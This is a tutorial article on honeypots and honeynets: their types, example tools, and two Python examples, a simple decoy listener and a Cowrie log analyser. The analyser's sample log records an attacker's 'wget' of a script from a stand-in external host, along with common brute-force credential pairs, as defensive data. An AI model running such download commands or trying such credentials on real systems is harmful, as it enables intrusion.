Honeypots and Honeynets

Part of the work of IT security specialists is to learn which attacks and techniques intruders actually use, and to collect evidence of attack attempts for later analysis. One way to collect that evidence is bait: a decoy designed to record the activity of attackers who do not know they are being watched. In IT security these decoys are called honeypots.

A honeypot is typically an application that simulates a target while really acting as a recorder of the attacker's activity. A group of honeypots that together simulate several services, devices and related applications is called a honeynet.

Honeypots and honeynets hold no sensitive data; they hold fake but attractive data so that attackers take an interest in them. In other words, they are traps for intruders, designed to learn their attack techniques. Because nobody has a legitimate reason to touch a honeypot, any connection to it is suspicious by definition, which is what makes its logs so valuable.

Honeypots give us two kinds of benefit. First, they let us study real attacks so we can properly secure our production devices and networks afterwards. Second, by running honeypots that simulate vulnerabilities next to production systems, we draw attackers' attention away from the hardened devices, since they will find the apparently exploitable honeypots more attractive. This second benefit only holds while the honeypot is convincing and properly isolated: a decoy is a monitoring tool, not a substitute for patching and hardening the production systems it sits beside.

There are different types of Honeypots:

Production Honeypots:

This type of honeypot is installed in a production network to collect information on the techniques used to attack systems within the infrastructure. It offers a wide range of options, from placing the honeypot in a specific network segment to detect legitimate users trying to reach resources they are not allowed to access, to a clone of a website or service, identical to the original, used as bait. The biggest drawback of this type is that malicious traffic mixes with legitimate traffic on the same network, and a compromised honeypot sits next to real assets, so it must be isolated carefully.

Research honeypots (sometimes called development honeypots):

This type of honeypot is designed to collect as much information as possible on hacking trends, the targets attackers prefer and where attacks originate. That information is later analyzed to support decisions about which security measures to implement.

The main advantage of this type, in contrast to production honeypots, is that research honeypots live in an independent network dedicated to research: the deliberately vulnerable system is separated from the production environment, so a compromised honeypot cannot be used as a pivot into production. Its main disadvantage is the amount of resources needed to build and operate it.

There is a second classification, independent of the one above, that divides honeypots into three categories according to how much interaction they allow an attacker.

Low Interaction Honeypots:

A low interaction honeypot emulates a vulnerable service, application or system without running the real thing. It is very easy to set up and carries little risk, but the information it can collect is limited to what the emulation understands. Some examples of this type are:

Honeytrap: designed to observe attacks against network services. Unlike other honeypots, which focus on capturing malware, it is designed to capture the exploits themselves.

Nepenthes: emulates known vulnerabilities in order to collect information on possible attacks. It is designed to emulate the vulnerabilities that worms exploit to propagate; Nepenthes then captures the worm's payload for later analysis.

HoneyC: a client honeypot that identifies malicious web servers by emulating different clients, sending requests and analyzing the servers' responses.

HoneyD: a daemon that creates virtual hosts on a network; each can be configured to run arbitrary services and to look like a different operating system to a fingerprinting tool.

Glastopf: a web application honeypot that emulates thousands of vulnerabilities to collect information on attacks against web applications. It is easy to set up, and once search engines index it, it becomes an attractive target for attackers.
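To make the idea concrete, here is a minimal low interaction honeypot of the kind described above. It is an added example and not code from the article or from any of the tools listed. It listens on a few non-privileged ports (assumed here: 2222 for SSH, 2121 for FTP, 8080 for HTTP), sends a plausible banner, records the first bytes every client sends as one JSON line, returns a canned reply, and closes. The banners, ports and the fake "Apache" server string are constructed for the example; nothing real runs behind them, which is exactly what limits how much such a honeypot can learn.

```python
import json
import re
import socketserver
import sys
import threading
import time

# Assumed emulated services (constructed for this example): port -> banner sent on connect.
# Non-privileged ports so the script runs without root; a deployment would redirect
# 22/21/80 to them with a firewall rule.
BANNERS = {
    2222: b"SSH-2.0-OpenSSH_7.4\r\n",   # looks like SSH, never completes a key exchange
    2121: b"220 (vsFTPd 3.0.3)\r\n",    # looks like FTP
    8080: b"",                           # HTTP: say nothing until a request arrives
}

HTTP_REQ = re.compile(rb"^([A-Z]{3,7}) (\S+) HTTP/1\.[01]\r?\n")


def classify(payload: bytes) -> str:
    """Label the first bytes a client sent; the label drives the canned reply."""
    if payload.startswith(b"SSH-"):
        return "ssh"
    if HTTP_REQ.match(payload):
        return "http"
    if payload.startswith(b"USER ") or payload.startswith(b"AUTH "):
        return "ftp"
    return "other"


def canned_reply(payload: bytes) -> bytes:
    """Low interaction: one plausible response, then the connection is closed."""
    kind = classify(payload)
    if kind == "http":
        path = HTTP_REQ.match(payload).group(2)
        body = b"<html><body>Login required</body></html>"
        # A fake admin page is more attractive bait than a 404 (compare Glastopf above).
        status = b"200 OK" if path.startswith(b"/wp-admin") or path == b"/" else b"404 Not Found"
        return (b"HTTP/1.1 " + status + b"\r\nServer: Apache/2.4.29 (Ubuntu)\r\n"
                b"Content-Type: text/html\r\nContent-Length: " +
                str(len(body)).encode() + b"\r\nConnection: close\r\n\r\n" + body)
    if kind == "ftp":
        return b"530 Login incorrect.\r\n"   # every credential fails: nothing real to log into
    return b""   # ssh/other: stay silent, then close


def make_event(dst_port: int, src_ip: str, src_port: int, payload: bytes) -> dict:
    """One JSON-serialisable record per connection; payload is bounded and text-safe."""
    return {
        "ts": time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()),
        "dst_port": dst_port, "src_ip": src_ip, "src_port": src_port,
        "kind": classify(payload),
        "payload": payload[:512].decode("utf-8", "replace"),
    }


LOG_LOCK = threading.Lock()


def write_event(event: dict, fh=sys.stdout) -> None:
    with LOG_LOCK:                       # handlers run in threads; keep lines intact
        fh.write(json.dumps(event) + "\n")
        fh.flush()


class Handler(socketserver.BaseRequestHandler):
    def handle(self):
        port = self.server.server_address[1]
        self.request.settimeout(10)      # a slow client must not hold a thread forever
        try:
            if BANNERS[port]:
                self.request.sendall(BANNERS[port])
            try:
                data = self.request.recv(4096)
            except OSError:
                data = b""
            write_event(make_event(port, *self.client_address, data))
            reply = canned_reply(data)
            if reply:
                self.request.sendall(reply)
        except OSError:
            pass                         # peer reset; whatever was captured is already logged


def serve(ports=BANNERS) -> list:
    """Start one threaded listener per emulated port and return the server objects."""
    servers = []
    for port in ports:
        srv = socketserver.ThreadingTCPServer(("0.0.0.0", port), Handler)
        srv.daemon_threads = True
        threading.Thread(target=srv.serve_forever, daemon=True).start()
        servers.append(srv)
    return servers


if __name__ == "__main__":
    serve()
    print("honeypot listening on", ", ".join(map(str, BANNERS)), file=sys.stderr)
    threading.Event().wait()
```

Run it, then `nc localhost 2222` or `curl http://localhost:8080/wp-admin/` from another terminal and watch the JSON lines on stdout. Note what the example deliberately does not do: it never authenticates anyone and never runs a command, so an attacker gains nothing from it, but for the same reason it records only the first probe of each connection. Collecting a full interactive session is what the medium and high interaction tools below are for.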

Medium Interaction Honeypots:

Medium interaction honeypots allow more interaction than low interaction ones, typically a fake login and an emulated shell or protocol, but they still do not expose a real operating system the way high interaction honeypots do. Some honeypots of this type are:

Kippo: an SSH honeypot used to log brute force attacks against Unix systems and, if the attacker "gains access", to log everything they do in the emulated shell. It was discontinued and replaced by Cowrie.

Cowrie: an SSH and Telnet honeypot that logs brute force attempts and the attacker's shell interaction. It emulates a Unix system, and it can also work as a proxy in front of a real backend while logging the attacker's activity.
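Capturing attempts is only half of the job; the logs have to be turned into decisions. The following is an added example, not part of the article or of the Cowrie project, that reads events in the shape of Cowrie's JSON log (one object per line, with `eventid`, `src_ip`, `session`, `timestamp`, and `username`/`password` or `input` depending on the event) and answers the questions an analyst asks first: which sources are brute forcing, which credentials are tried most, and what was run after a login succeeded. The log lines are constructed for the example and use documentation address ranges; the field names follow Cowrie's format but the thresholds are assumptions.

```python
import json
from collections import Counter, defaultdict
from datetime import datetime

# Constructed sample in the shape of Cowrie's JSON log: one event per line.
# 203.0.113.5 hammers the decoy, then "logs in" with admin/admin and runs commands;
# 198.51.100.9 only tries twice. The last line is deliberately malformed.
SAMPLE_LOG = """\
{"eventid":"cowrie.session.connect","src_ip":"203.0.113.5","session":"a1","timestamp":"2023-05-01T10:00:00.000000Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","src_ip":"203.0.113.5","session":"a1","timestamp":"2023-05-01T10:00:01.000000Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"password","src_ip":"203.0.113.5","session":"a1","timestamp":"2023-05-01T10:00:03.000000Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","src_ip":"203.0.113.5","session":"a1","timestamp":"2023-05-01T10:00:05.000000Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"toor","src_ip":"203.0.113.5","session":"a2","timestamp":"2023-05-01T10:00:07.000000Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456","src_ip":"203.0.113.5","session":"a2","timestamp":"2023-05-01T10:00:09.000000Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234","src_ip":"203.0.113.5","session":"a2","timestamp":"2023-05-01T10:00:11.000000Z"}
{"eventid":"cowrie.login.success","username":"admin","password":"admin","src_ip":"203.0.113.5","session":"a3","timestamp":"2023-05-01T10:00:20.000000Z"}
{"eventid":"cowrie.command.input","input":"uname -a","src_ip":"203.0.113.5","session":"a3","timestamp":"2023-05-01T10:00:21.000000Z"}
{"eventid":"cowrie.command.input","input":"wget http://198.51.100.7/x.sh","src_ip":"203.0.113.5","session":"a3","timestamp":"2023-05-01T10:00:25.000000Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","src_ip":"198.51.100.9","session":"b1","timestamp":"2023-05-01T11:00:00.000000Z"}
{"eventid":"cowrie.login.failed","username":"pi","password":"raspberry","src_ip":"198.51.100.9","session":"b1","timestamp":"2023-05-01T11:00:30.000000Z"}
this line is not JSON and must be skipped, not crash the report
"""


def parse_ts(ts: str) -> datetime:
    """Cowrie writes ISO-8601 with microseconds and a trailing Z."""
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%fZ")


def parse_events(text: str) -> list:
    """One dict per valid line; malformed lines are dropped rather than aborting the run."""
    events = []
    for line in text.splitlines():
        try:
            ev = json.loads(line)
        except ValueError:
            continue
        if isinstance(ev, dict) and "eventid" in ev:
            events.append(ev)
    return events


def failed_logins_by_ip(events: list) -> Counter:
    return Counter(ev["src_ip"] for ev in events if ev["eventid"] == "cowrie.login.failed")


def top_credentials(events: list, n: int = 5) -> list:
    """Most-tried (username, password) pairs across every source: what to ban first."""
    pairs = Counter((ev["username"], ev["password"]) for ev in events
                    if ev["eventid"] in ("cowrie.login.failed", "cowrie.login.success"))
    return pairs.most_common(n)


def brute_force_sources(events: list, threshold: int = 5, window_s: int = 60) -> list:
    """IPs with at least `threshold` failed logins inside any `window_s` span (sliding window).
    Threshold and window are assumptions; tune them to your own baseline."""
    by_ip = defaultdict(list)
    for ev in events:
        if ev["eventid"] == "cowrie.login.failed":
            by_ip[ev["src_ip"]].append(parse_ts(ev["timestamp"]))
    hits = []
    for ip, times in by_ip.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while (t - times[start]).total_seconds() > window_s:
                start += 1           # drop attempts that fell out of the window
            if end - start + 1 >= threshold:
                hits.append(ip)
                break
    return sorted(hits)


def post_login_commands(events: list) -> dict:
    """Commands typed in sessions that reached cowrie.login.success: the payload of interest."""
    logged_in = {ev["session"] for ev in events if ev["eventid"] == "cowrie.login.success"}
    cmds = defaultdict(list)
    for ev in events:
        if ev["eventid"] == "cowrie.command.input" and ev["session"] in logged_in:
            cmds[ev["session"]].append(ev["input"])
    return dict(cmds)


def report(text: str) -> dict:
    events = parse_events(text)
    return {
        "failed_by_ip": dict(failed_logins_by_ip(events)),
        "top_credentials": top_credentials(events, 3),
        "brute_force_sources": brute_force_sources(events),
        "post_login_commands": post_login_commands(events),
    }


if __name__ == "__main__":
    print(json.dumps(report(SAMPLE_LOG), indent=2, default=str))
```

Point `report()` at a real `cowrie.json` and the output maps directly onto the decisions the research honeypot section describes: the brute force sources become firewall or fail2ban input, the top credentials become a deny list for password policy, and the post-login commands (here a `wget` of a script from another host) tell you which URLs and hashes to hunt for on production systems.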

Sticky_elephant: a PostgreSQL honeypot.

Hornet: an improved version of honeypot-wasp with a fake credentials prompt, designed for websites that expose a public administrator login page, such as /wp-admin on WordPress sites.

High Interaction Honeypots:

Here the honeypot is not just a recorder: it is a real (or nearly real) system that interacts with the attacker while exhaustively logging the interaction. It simulates a target capable of giving every answer the attacker expects, which yields the richest data but also the greatest risk, since a real system can be fully compromised and must be contained so it cannot be used to attack others. Some honeypots of this type are:

Sebek: works like a HIDS (Host-based Intrusion Detection System), capturing information about activity on the honeypot from inside the kernel so the attacker cannot easily see it. It is a client-server tool: clients deployed on Linux, Unix and Windows honeypots capture the data and send it to a collection server.

HoneyBow: a high interaction malware collection tool that can be combined with low interaction honeypots to increase the amount of information collected.

HI-HAT (High Interaction Honeypot Analysis Toolkit): converts PHP applications into high interaction honeypots and provides a web interface for reviewing the collected information.

Capture-HPC: similar to HoneyC, a client honeypot that identifies malicious servers by interacting with them as a client from a dedicated virtual machine and recording any unauthorized changes to the system.

If you are interested in honeypots, IDS (Intrusion Detection Systems) will probably interest you as well; LinuxHint has a couple of tutorials about them.

I hope you found this article on honeypots and honeynets useful. Keep following LinuxHint for more tips and updates on Linux and security.

About the author

Ivan Vanney

Ivan Vanney has been a writer for LinuxHint for over two years; he is co-founder of the freelance services marketplace where he works as a sysadmin.